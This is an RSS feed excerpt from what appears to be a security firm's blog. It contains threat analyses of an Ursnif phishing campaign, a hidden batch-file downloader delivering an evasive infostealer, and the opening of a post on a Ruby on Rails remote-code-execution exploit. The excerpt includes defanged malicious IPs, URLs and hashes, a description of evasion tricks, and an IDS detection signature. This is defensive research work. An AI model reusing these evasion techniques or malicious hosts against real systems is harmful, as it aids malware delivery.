        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Poco tempo dopo la segnalazione, i file con le credenziali compromesse sono stati rimossi dal server.&lt;/p&gt;
&lt;p&gt;Questo rilevamento ci permette di affermare che, per quanto riguarda le campagne attualmente in atto, i responsabili della diffusione del malware Ursnif abbiano completo accesso e disponibilità delle caselle di posta delle loro vittime, senza alcuna necessità di utilizzare bot o strumenti di intercettazione. Inoltre, espone tutti i contatti delle vittime ad attacchi di spear phishing tramite thread injection, come quelli sopra descritti.&lt;/p&gt;
&lt;p&gt;Analizzando alcune mail appartenenti a queste campagne in cerca di anomalie, abbiamo rilevato che il &lt;a href=&quot;https://en.wikipedia.org/wiki/Bounce_address&quot;&gt;bounce address&lt;/a&gt; non corrispondeva con l&apos;indirizzo presumibilmente compromesso. Il controllo degli header Received delle mail ha confermato che il server da cui venivano trasmesse queste mail apparteneva all&apos;organizzazione del bounce address. In base a questo possiamo dire che, al momento in cui scrivamo questo articolo, gli account compromessi non vengano utilizzati per inviare attivamente le mail di phishing. Molto probabilmente si tratta di una scelta ponderata da parte degli attaccanti, in modo da aggirare eventuali filtri in uscita da parte dei server delle loro vittime: infatti un errore di consegna potrebbe allarmare l&apos;utente (o il responsabile della gestione della mail aziendale) che andrebbe quindi in cerca di anomalie, utilizzando invece mail server di una terza parte si evitano questi &quot;inconvenienti&quot;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 947px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/85ca9b9aad7fd953582ef63f4a55375e/78597/Mailsnif3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 101.04166666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABjklEQVR42q2U3S8DQRTF73608VGqtN2i2pJsVVJaEhI8EB5ESIhIPXjyF4iE/9+5nGF2MtsoTvJLN7O3M+d+zIqI1MAQDMA+WJFPBfIt81xjzA7/44uVHiiDQ5CAPlgFBSvY/KEN1sEBKHHTPZr5kgadgSvwALa5HnocNsE1uAR33GgRLIkTfMzAC8tZiU6b1to0D9fYUxCLR+b0Fiha6+rwiOuqCp8jutLUUz5npHa7LLB9YoEuuowpWwetgQ44YQYZaSO2wDJPt50ndFWw1jWmym4/OrXOTTniiCxY781vTIf6bl5ypPW4YRpFOpjKie2xKQ0Zo1vwysA2g6OcTO7BMzhnmfqciIyGrEeb7HJkxDPcOmIjNlEP3nA7bQJTZ2wC50qF7LRuMjsu3RZtN1i7qlPskA3Q93OeJrkHf3RTm1HnTYi5SeRsFPo+BONuSofzFvNWJJNuZDTD+ulHYZMjVJE/qMe0A6ZtmlOaxJWtlI2p8sM5oMO671r9RHojnsAbeLFmKpB/VPDbDd8Bv/wX9fHKWCsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Mailsnif3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/85ca9b9aad7fd953582ef63f4a55375e/78597/Mailsnif3.png&quot;
        srcset=&quot;/website/static/85ca9b9aad7fd953582ef63f4a55375e/804b2/Mailsnif3.png 384w,
/website/static/85ca9b9aad7fd953582ef63f4a55375e/e5715/Mailsnif3.png 768w,
/website/static/85ca9b9aad7fd953582ef63f4a55375e/78597/Mailsnif3.png 947w&quot;
        sizes=&quot;(max-width: 947px) 100vw, 947px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Il miglior modo per difendersi da questo genere di attacchi è non abilitare in alcun caso le MACRO di qualunque documento ricevuto via mail (o tramite link ricevuti via mail). È comunque importante possedere, e mantenere aggiornato, un buon sistema di difesa sia perimetrale (antispam, firewall) che locale (antivirus), così da ridurre il rischio e contrastare eventuali infezioni.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[New spam campaign delivering evasive malware]]></title><description><![CDATA[Hi everyone, here’s Matteo Lodi, member of the Incident Response Team. Today, we want to talk about a new threat we have just detected while analyzing the alerts generated by our platform.]]></description><link>https://www.certego.net/blog/blog-new-spam-campaign/</link><guid isPermaLink="false">blog-new-spam-campaign</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intelligence Team Leader]]></dc:creator><pubDate>Thu, 18 Jan 2018 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Hi everyone, here’s Matteo Lodi, member of the Incident Response Team.&lt;/p&gt;
&lt;p&gt;Today, we want to talk about a new threat we have just detected while analyzing the alerts generated by our platform.&lt;/p&gt;
&lt;p&gt;Everthing started from the analysis of the following ET Signature &lt;em&gt;&lt;strong&gt;ET TROJAN Windows executable base64 encoded&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 866px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/fcb3ecee51085f98a19bbc9637267112/c1328/NewSpamCampaign1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 13.020833333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAABYlAAAWJQFJUiTwAAAAtElEQVR42h1Ouw6CMADkPzUOYsCYoOLiDzj6C25uEgRseYmJicYVqpObiQItcTVoa8Hi5XK5x3LSt64Z/TBeFcd9BswMrFPHyF1bUPjcczJgNaaJ5sM2MtcSTK3VK71LlNfvsqS8us5n57GSDOVYaaGxcplqSFcSTUajXjzoIF1F/xVN1ETrxv32bbmQmACljPPn6VBEHg5ADi2hOIRkF+AAYn8jIol87DmiIVtPvCAhxAH4AbwNhmuNtuOZAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NewSpamCampaign1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/fcb3ecee51085f98a19bbc9637267112/c1328/NewSpamCampaign1.png&quot;
        srcset=&quot;/website/static/fcb3ecee51085f98a19bbc9637267112/804b2/NewSpamCampaign1.png 384w,
/website/static/fcb3ecee51085f98a19bbc9637267112/e5715/NewSpamCampaign1.png 768w,
/website/static/fcb3ecee51085f98a19bbc9637267112/c1328/NewSpamCampaign1.png 866w&quot;
        sizes=&quot;(max-width: 866px) 100vw, 866px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;At the first glance, it seemed that there were no executables downloaded.&lt;/p&gt;
&lt;p&gt;That was quite strange. A deeper analysis showed that many hosts belonging to one of our customers downloaded a zip file from different domains but the same IP.&lt;/p&gt;
&lt;p&gt;Here we are! We could guess that a new spam campaign has just started and many domains are being used to deliver a malware.&lt;/p&gt;
&lt;p&gt;So, we started to analyze “Nuovo documento 2018.zip” to understand what kind of threat it is. Once uncompressed, we found inside a batch file called “Nuovo documento 2018.bat”.&lt;/p&gt;
&lt;p&gt;The first two lines are the following:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1416px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/654bd1946b8c5145307842902acda8e0/d4e7f/NewSpamCampaign2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.458333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAABYlAAAWJQFJUiTwAAAATUlEQVR42j2NSxLAMAhCc/97VtS6ibFZh/T3NuAMQnMzEbh71cjM3nNs3YzfPednrps5Z4s4FQpBRABgkakpNmwUcggDVM4wBtWq93kBqapvWQsH5PQAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NewSpamCampaign2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/654bd1946b8c5145307842902acda8e0/d4e7f/NewSpamCampaign2.png&quot;
        srcset=&quot;/website/static/654bd1946b8c5145307842902acda8e0/804b2/NewSpamCampaign2.png 384w,
/website/static/654bd1946b8c5145307842902acda8e0/e5715/NewSpamCampaign2.png 768w,
/website/static/654bd1946b8c5145307842902acda8e0/d4e7f/NewSpamCampaign2.png 1416w&quot;
        sizes=&quot;(max-width: 1416px) 100vw, 1416px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Oh, let’s see what it is:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1426px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/0ace298e53aede5d79c7d1ecfac199cd/daed9/NewSpamCampaign3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 68.48958333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABYlAAAWJQFJUiTwAAACoUlEQVR42mP49uXzvdvX79+5+eDOrQd3bz28e/v+bSAbxH14D8R++uj+q2dPHt278+ju7aePHz158uTli+evXr54+fI5Q29XR311VWNdbWNdTVNdbUtDfVN9bVN9XXNDXXM9CLU3N3W1tbY1N7U01re2NLe0tLS3t7e1tk7o72dQ19Dg4eUVEhYWFBISEBTk5uHh4ORi5+BkY+dkZePg5OTiACEgzQVUJggDPDw8SkpKDJaWFgoKCmpqqsrKylpaWrGxsWlpaRkZqTnZGXk5melpqUCUlpqSnp4eHBysrKSkqqoKVKyoqGhqaspgZmYqKyuroqIMJE1MTJ4/f/7j9/87D99v2XdryfoLn7/9/vLtz+evv/7//3/kyBFJSUmgHUA7gYqNDA0ZTMGagULSMjIW5mZXr98LzFqhbN8ta9FqFTh5+4Gbuw7d3nXoFqZmQ5BmUzOQZhUVaWkZK0vz85duB2eviilcGVe40jdp/qJ159Zsu7zv2B2g5qNHj4I0KyFpNjMzAztbRUZGxsrK/PT5m+m1Ww6fvr9s43mXqFnrdl7duv/GgeN3EZqVQdpl5WQNjVCdDdQMtDk8f01F547cuo1AzSu3Xtqw+9rBE6iakZwN1qyiDHS2pYXZpat3nWIWKtl1K9p02IdOX7n50todV7buv47L2YjQNjUxefT4ydmrLxavO1vVub2kZfODJ+8ePnn/6OlboObDhw+jhLaREYO5ubm8vDww9oAk0P8vXrwAqvv3799/JPDnzx+IzdLS0kCVwAACKjY2NmbQ09MTFRUFigJJDQ2NHTu2nzlz9tjxEydOnDx58hQEHT9+4vLly7NnzxYSEpICA6BiYIpiiIqKcnV19fLy8gQDHx8fXxhAZkO4EDVAxW5ubmFhYQCezmr5YoTa5AAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NewSpamCampaign3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/0ace298e53aede5d79c7d1ecfac199cd/daed9/NewSpamCampaign3.png&quot;
        srcset=&quot;/website/static/0ace298e53aede5d79c7d1ecfac199cd/804b2/NewSpamCampaign3.png 384w,
/website/static/0ace298e53aede5d79c7d1ecfac199cd/e5715/NewSpamCampaign3.png 768w,
/website/static/0ace298e53aede5d79c7d1ecfac199cd/daed9/NewSpamCampaign3.png 1426w&quot;
        sizes=&quot;(max-width: 1426px) 100vw, 1426px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;A poorly trained eye could have just said to himself: “Well that’s just an image, this batch is harmless”&lt;/p&gt;
&lt;p&gt;But it wasn’t. In fact, the batch file was other 200 empty lines long and, at the end of it, there were the following statements:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1426px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/bcadd18bc35668e119da1da5d6a1eb98/daed9/NewSpamCampaign4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 21.614583333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAlElEQVR42lWOyxaDIAxE/f+P9GhBCCThVYnbjnbT3tXlJDNhUZF93zlzDDGEmFJi5tZaSllVKVIiyik/co+8PyhGIup9LCKyrise7uVCCNu2wfUBI9QhAC+liGjv/TzP94OZLcJy+MN7jxjEOcfYKje11m8LHH+pteEaMjZtznmHVZRZxhhoHQ/ovq7L/vluzx/M7APqWt6A+11XQgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NewSpamCampaign4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/bcadd18bc35668e119da1da5d6a1eb98/daed9/NewSpamCampaign4.png&quot;
        srcset=&quot;/website/static/bcadd18bc35668e119da1da5d6a1eb98/804b2/NewSpamCampaign4.png 384w,
/website/static/bcadd18bc35668e119da1da5d6a1eb98/e5715/NewSpamCampaign4.png 768w,
/website/static/bcadd18bc35668e119da1da5d6a1eb98/daed9/NewSpamCampaign4.png 1426w&quot;
        sizes=&quot;(max-width: 1426px) 100vw, 1426px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;So we found that it’s a downloader. It tries to get a fake php file that, indeed, it’s the base64 encoded executable reported by our platform.&lt;/p&gt;
&lt;p&gt;We also noticed the CnC server has implemented a domain whitelist and it allows to download the malware only by the IPs it sent the phishing campaign. If someone tries to get the zip file connecting from other IPs, the site would return a xml empty page.&lt;/p&gt;
&lt;p&gt;First VirusTotal analysis wasn’t really satisfying because there was no indication about the malware classification, enhancing our hypothesis about a new spreading threat:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1428px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3f6fc0fe05bd3f6f7f1725c4a4551087/ccf0c/NewSpamCampaign5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 50.260416666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAABYlAAAWJQFJUiTwAAABgklEQVR42k1RyW7dMAz0/39UkXMPOfSQoECQNI63Z0nUYi2WZEkZvYcWHRASSXHIMT1cOW/r6pzTSi/zsm0bznEcb7dNKSklPYxzIQQRSSGktfLns3r+RUNM6cfT0zTPSik8khDTNC3LMs/Tus64Hwas68YY33dOxF9/397e2ZBDYC8vTpDSGqMOYwTnDFWcIfzfBBdIdz7OfZWSDynmy8fTueM4wHe2g0MlQaWAYLo7pPq135m3nUHIvrPhTEUfKeUUYzylTtY5TGEsOHjWGI11OO88414pS9IKOoi01pgxlHKRYAhSTO3PV+WiKd2kailfpWAR7YG3j2Zsi7GdsaXUaq2tDdd1sZ2FEAowLUVQIVmULrkD+rHyfF3lc+5JbYqQJaZSOzoZG4ZmdK/TWgVVqaqQ1fr+RIThINfPqSrdzRw15/qPjN167zt5nCunGlMNJyruonb8Wx9C+xh7Rx9qeUz9S8ZGuovssvXGCK0DGd9hjInoBXwt9bDdUIAWd/I3c4s3O0NRvj8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NewSpamCampaign5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3f6fc0fe05bd3f6f7f1725c4a4551087/ccf0c/NewSpamCampaign5.png&quot;
        srcset=&quot;/website/static/3f6fc0fe05bd3f6f7f1725c4a4551087/804b2/NewSpamCampaign5.png 384w,
/website/static/3f6fc0fe05bd3f6f7f1725c4a4551087/e5715/NewSpamCampaign5.png 768w,
/website/static/3f6fc0fe05bd3f6f7f1725c4a4551087/ccf0c/NewSpamCampaign5.png 1428w&quot;
        sizes=&quot;(max-width: 1428px) 100vw, 1428px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Then, we sent the malware to our threat intelligence platform for further analysis.&lt;/p&gt;
&lt;p&gt;External and internal feed couldn&apos;t identify with ease what kind of malware it is.&lt;/p&gt;
&lt;p&gt;In fact, as already said, the threat is new: manual or automatic analysis didn&apos;t get a perfect indication. However, this kind of anti-VM and anti-debugging abilities could lead us to guess that it&apos;s an infostealer, probably a Ursnif variant.&lt;/p&gt;
&lt;p&gt;Meanwhile, we alerted the customer: to contain the threat, we worked together to find the mail responsible of the infection. The mail was the following one:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1422px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/939d2f997be00f9dafcc7abdf5869ec5/2a08f/NewSpamCampaign6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 52.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAABYlAAAWJQFJUiTwAAABKklEQVR42o2R247DIAxE8/9/2NUmpBAI4Rba3F73mKp9q7QTCTkWM4zHXck5hJBSnh3f7NwcY1waQoznd1zX1T1qzaXUWlNKawNCz+dzbzi+YT/gd3CsdSmnGBMSkDGybdt1na9r5yn3WiEnfYCukDHprINfHwLIMNEozU5d+USx6cqVnDP1eTXb3nvnnNFG37W+3wegVN8PdOgTg9ET6sYYO1mak5mg+GXhjU5SIidrlVJ2muD2v71SY0ypJRdesyzeM2DO5Cug3rZdZtbahBCxVArWxLBgLTwAn5LbsYEuJyJrWbd97/w8324/WmtcDf0wqhGhGAJ9yNDmViDL8iAuYnnBFhthVY93HvImpezwvcnX+Sk+vy32q2MMgmE2HkBMVvgPkNZxHH+MuC2cVoeQcwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NewSpamCampaign6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/939d2f997be00f9dafcc7abdf5869ec5/2a08f/NewSpamCampaign6.png&quot;
        srcset=&quot;/website/static/939d2f997be00f9dafcc7abdf5869ec5/804b2/NewSpamCampaign6.png 384w,
/website/static/939d2f997be00f9dafcc7abdf5869ec5/e5715/NewSpamCampaign6.png 768w,
/website/static/939d2f997be00f9dafcc7abdf5869ec5/2a08f/NewSpamCampaign6.png 1422w&quot;
        sizes=&quot;(max-width: 1422px) 100vw, 1422px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;So, as already seen in older phishing campaigns, users have to pay attention to emails with “pending invoice” or similar as subject and they haven’t to get tricked to click to the link provided after panicking about a fake unpaid bill.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We found a new spam campaign delivering an evasive infostealer, targeting at least Italian users&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IOC&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;IP&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;185.61.152[.]71&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;URL&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;www.synchronr[.]com/jcsuyg?wkblw=142954(download)&quot;&gt;&lt;pre class=&quot;language-www.synchronr[.]com/jcsuyg?wkblw=142954(download)&quot;&gt;&lt;code class=&quot;language-www.synchronr[.]com/jcsuyg?wkblw=142954(download)&quot;&gt;cloudblueprintprogram[.]com/images4.php (Malware)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;MD5&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;e1e4e1c8288a62c7f4acb9ba4b5d2a57malware.exe (malware)&quot;&gt;&lt;pre class=&quot;language-e1e4e1c8288a62c7f4acb9ba4b5d2a57malware.exe (malware)&quot;&gt;&lt;code class=&quot;language-e1e4e1c8288a62c7f4acb9ba4b5d2a57malware.exe (malware)&quot;&gt;c7bfa2bb1a027d6179eaa5d48465fad3 images4.php (malware base64 encoded)
a09916eb46ff94a89f09a072100eb3eb Nuovo documento 2018.bat (dropper)```&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[Ruby RCE pushing Monero Coinminer]]></title><description><![CDATA[Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00. The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution.]]></description><link>https://www.certego.net/blog/ruby-rce-used-to-push-monero-coinminer/</link><guid isPermaLink="false">ruby-rce-used-to-push-monero-coinminer</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><pubDate>Wed, 10 Jan 2018 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.&lt;/p&gt;
&lt;p&gt;The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;alert http $EXTERNAL_NET any -&gt; $HTTP_SERVERS any (msg:&quot;ET CURRENT_EVENTS Possible CVE-2013-0156 Ruby On Rails XML POST to Disallowed Type YAML&quot;; flow:established,to_server; content:&quot;POST&quot;; http_method; content:&quot;|0d 0a|Content-Type|3a 20|&quot;; pcre:&quot;/^(?:application\/(?:x-)?|text\/)xml/R&quot;; content:&quot; type=&quot;; http_client_body; nocase; fast_pattern; content:&quot;yaml&quot;; distance:0; nocase; http_client_body; pcre:&quot;/&amp;lt;[^&gt;]*\stype\s*=\s*([\x22\x27])yaml\1/Pi&quot;; reference:url,groups.google.com/forum/?hl=en&amp;amp;fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ; classtype:web-application-attack; sid:2016175; rev:3; metadata:created_at 2013_01_09, updated_at 2013_01_09;)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The attacker has been sending the following data through a POST request:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1390px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ed67e8f813234ea0a6354f186c48e82d/f1c64/RubyRCE2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 40.88541666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAABYlAAAWJQFJUiTwAAABHklEQVR42iWQyZKEMAxD8/8fOGQje0JYug8N3OcFXEXK2JIsW7Tael9Lzq0tax/BW2ulXkvNKddSWmv5AZDHGEsu1EEKPnrBx5wHqC+DiUIIMaVUHjT1fd/hv8wUE8lxfMTSWowp+OCcd/OstUE1hGC0mefZe09ea0ELTPCeonNumiRGBPbghBHRO08nBnQTeQRMxc7QrJ3JB+gJY+ywDZQh9JTURmsplTUWF0ppJSUtrUbRGDP9TWoEJcNkthPL0uEPMwy1r4UxEG+osByb8yAnJ/kuwiHZZl03wQHQBsK2SiocDlfaDjVrh/nIOg4+p0YRMvM+x7H2VWzbxjG/3++xH63Wbdv7slC87/u6zue9fr/f/QT5eZ78XtfI/wFX/KifLouFXQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RubyRCE2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ed67e8f813234ea0a6354f186c48e82d/f1c64/RubyRCE2.png&quot;
        srcset=&quot;/website/static/ed67e8f813234ea0a6354f186c48e82d/804b2/RubyRCE2.png 384w,
/website/static/ed67e8f813234ea0a6354f186c48e82d/e5715/RubyRCE2.png 768w,
/website/static/ed67e8f813234ea0a6354f186c48e82d/f1c64/RubyRCE2.png 1390w&quot;
        sizes=&quot;(max-width: 1390px) 100vw, 1390px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The attacker sends a base64 encoded payload inside a POST request in the hope that the ruby interpreter configured on the server will execute it. By unpacking the payload we obtained the following code:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1122px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/022b1e61daba1271994251ba8a071f9a/62a6a/RubyRCE3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
